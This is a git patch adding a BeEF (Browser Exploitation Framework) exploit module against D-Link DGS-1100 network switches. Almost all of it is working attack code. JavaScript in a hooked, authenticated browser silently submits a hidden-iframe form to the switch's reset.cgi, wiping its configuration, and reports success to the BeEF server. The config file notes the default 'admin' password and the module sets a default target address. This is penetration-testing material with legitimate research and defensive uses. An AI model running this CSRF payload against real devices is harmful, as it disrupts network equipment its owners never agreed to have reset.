From 14d60c57d8734cfbe77b85e5b87c94125a6d1c30 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Thu, 23 Feb 2017 19:20:13 -0600 Subject: [PATCH] Adding DLink DGS 1100 Switch Device Reset CSRF Module --- .../dlink_dgs_1100_device_reset/command.js | 36 +++++++++++++++++++ .../dlink_dgs_1100_device_reset/config.yaml | 15 ++++++++ .../dlink_dgs_1100_device_reset/module.rb | 18 ++++++++++ 3 files changed, 69 insertions(+) create mode 100644 modules/exploits/switch/dlink_dgs_1100_device_reset/command.js create mode 100644 modules/exploits/switch/dlink_dgs_1100_device_reset/config.yaml create mode 100644 modules/exploits/switch/dlink_dgs_1100_device_reset/module.rb diff --git a/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js b/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js new file mode 100644 index 000000000..b5164a929 --- /dev/null +++ b/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js @@ -0,0 +1,36 @@ +// +// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + // Hooked browser must be authenticated to switch. + var base = '<%= @base %>'; + + var dlink_dgs_iframe = beef.dom.createInvisibleIframe(); + + var form = document.createElement('form'); + form.setAttribute('action', base + "/cgi/reset.cgi"); + form.setAttribute('method', 'POST'); + + var input = null; + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'reset'); + input.setAttribute('value', 1); + form.appendChild(input); + + dlink_dgs_iframe.contentWindow.document.body.appendChild(form); + form.submit(); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(dlink_dgs_iframe); + } + + setTimeout("cleanup()", 15000); +}); + diff --git a/modules/exploits/switch/dlink_dgs_1100_device_reset/config.yaml b/modules/exploits/switch/dlink_dgs_1100_device_reset/config.yaml new file mode 100644 index 000000000..49c18a010 --- /dev/null +++ b/modules/exploits/switch/dlink_dgs_1100_device_reset/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + Dlink_dgs_1100_device_reset_csrf: + enable: true + category: ["Exploits", "Switch"] + name: "DLINK DGS 1100-08 Device Reset CSRF" + description: "Reset's everything on the device except for the IP address. Default password is 'admin'" + authors: ["Nick Starke"] + target: + working: ["ALL"] diff --git a/modules/exploits/switch/dlink_dgs_1100_device_reset/module.rb b/modules/exploits/switch/dlink_dgs_1100_device_reset/module.rb new file mode 100644 index 000000000..ff8f1fab4 --- /dev/null +++ b/modules/exploits/switch/dlink_dgs_1100_device_reset/module.rb @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Dlink_dgs_1100_device_reset_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Switch web root', 'value' => 'http://10.90.90.90'}, + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end